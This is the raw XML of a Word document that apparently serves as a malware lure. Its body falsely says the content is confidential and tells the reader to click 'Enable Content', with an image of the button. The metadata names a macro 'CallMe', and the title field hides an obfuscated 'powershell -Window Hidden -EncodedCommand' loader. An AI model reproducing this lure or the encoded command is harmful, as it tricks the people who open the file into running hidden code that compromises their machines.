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2F5496"/>
  <w:body>
    <w:p w:rsidR="007F2282" w:rsidRPr="00601C3B" w:rsidRDefault="00B81AE5" w:rsidP="007F2282">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36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-361950</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>31115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2438400" cy="2438400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="4388" y="1013"/>
                <wp:lineTo x="4388" y="6750"/>
                <wp:lineTo x="2531" y="7931"/>
                <wp:lineTo x="2194" y="8269"/>
                <wp:lineTo x="2194" y="16875"/>
                <wp:lineTo x="2700" y="17550"/>
                <wp:lineTo x="4388" y="17550"/>
                <wp:lineTo x="4388" y="20419"/>
                <wp:lineTo x="19238" y="20419"/>
                <wp:lineTo x="19069" y="5400"/>
                <wp:lineTo x="15188" y="1013"/>
                <wp:lineTo x="4388" y="1013"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="3" name="Picture 2" descr="Resultado de imagen para word im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Resultado de imagen para word image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8400" cy="2438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7F2282" w:rsidRPr="00601C3B" w:rsidRDefault="00497492" w:rsidP="007F2282">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497492">
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Warning! This document has confidential information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">If you </w:t>
      </w:r>
      <w:r w:rsidRPr="00497492">
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>need to review the information, you will need to enable the content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2282" w:rsidRPr="00601C3B" w:rsidRDefault="007F2282" w:rsidP="007F2282">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00497492" w:rsidRDefault="00497492" w:rsidP="007F2282">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F2282" w:rsidRPr="00601C3B" w:rsidRDefault="00497492" w:rsidP="007F2282">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Clic on</w:t>
      </w:r>
      <w:r w:rsidR="007F2282" w:rsidRPr="00601C3B">
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Enable Content” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>to display the information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2282" w:rsidRPr="00601C3B" w:rsidRDefault="00B81AE5" w:rsidP="007F2282">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008422E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5162550" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="Resultado de imagen para enable content wor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n para enable content word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832" t="30534" r="38870" b="1832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62550" cy="952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F2282" w:rsidRPr="00DF7E75" w:rsidRDefault="007F2282" w:rsidP="007F2282"/>
    <w:p w:rsidR="007F2282" w:rsidRDefault="007F2282" w:rsidP="007F2282"/>
    <w:p w:rsidR="00F37E68" w:rsidRDefault="00F37E68"/>
    <w:sectPr w:rsidR="00F37E6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2282"/>
    <w:rsid w:val="000B11D6"/>
    <w:rsid w:val="00101DA1"/>
    <w:rsid w:val="00150394"/>
    <w:rsid w:val="002B33AC"/>
    <w:rsid w:val="003676C4"/>
    <w:rsid w:val="003B5B26"/>
    <w:rsid w:val="003D49B8"/>
    <w:rsid w:val="00497492"/>
    <w:rsid w:val="00531132"/>
    <w:rsid w:val="00617C42"/>
    <w:rsid w:val="007F2282"/>
    <w:rsid w:val="0080248D"/>
    <w:rsid w:val="009179FE"/>
    <w:rsid w:val="009E66F7"/>
    <w:rsid w:val="00A9795E"/>
    <w:rsid w:val="00AB7808"/>
    <w:rsid w:val="00B136C4"/>
    <w:rsid w:val="00B81AE5"/>
    <w:rsid w:val="00BE041A"/>
    <w:rsid w:val="00C02615"/>
    <w:rsid w:val="00D70152"/>
    <w:rsid w:val="00DF4658"/>
    <w:rsid w:val="00F0495F"/>
    <w:rsid w:val="00F37E68"/>
    <w:rsid w:val="00F62A2F"/>
    <w:rsid w:val="00FC2E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970C8C3-53AB-4821-A49F-0B7AA03877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7F2282"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="es-DO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ALLME" wne:name="Project.NewMacros.CallMe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29</Words>
  <Characters>162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powershell -Sta -Nop -Window Hidden -EncodedCommand cwB2ACAAbwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACkAOwBzAHYAIABkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgB</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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powershell -Sta -Nop -Window Hidden -EncodedCommand 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</dc:title>
  <dc:subject/>
  <dc:creator>newuser</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>newuser</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-27T14:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-27T14:00:00Z</dcterms:modified>
  <cp:contentStatus>status</cp:contentStatus>
</cp:coreProperties>
</file>